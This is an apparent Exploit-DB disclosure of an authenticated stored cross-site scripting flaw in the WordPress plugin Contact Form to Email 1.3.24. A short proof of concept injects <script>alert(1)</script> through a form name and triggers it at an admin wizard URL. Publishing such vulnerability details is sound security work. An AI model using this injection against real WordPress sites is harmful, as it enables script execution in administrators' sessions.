WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)

Author: Mohammed Aadhil Ashfaq
type: webapps
platform: php
port: 
date_added: 2021-11-15  
date_updated: 2021-11-15  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 50524.txt  
# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 11/11/2021
# Exploit Author: Mohammed Aadhil Ashfaq
# Vendor Homepage: https://form2email.dwbooster.com/
# Version: 1.3.24
# Tested on: wordpress

POC
1. Click Contact form to Email
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail
2. Create new form name with <script>alert(1)</script>
3. Click Publish
4. XSS has been triggered
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687
5. Open a different browser, logged in with wordpress. Copy the URL and
Press enter. XSS will trigger.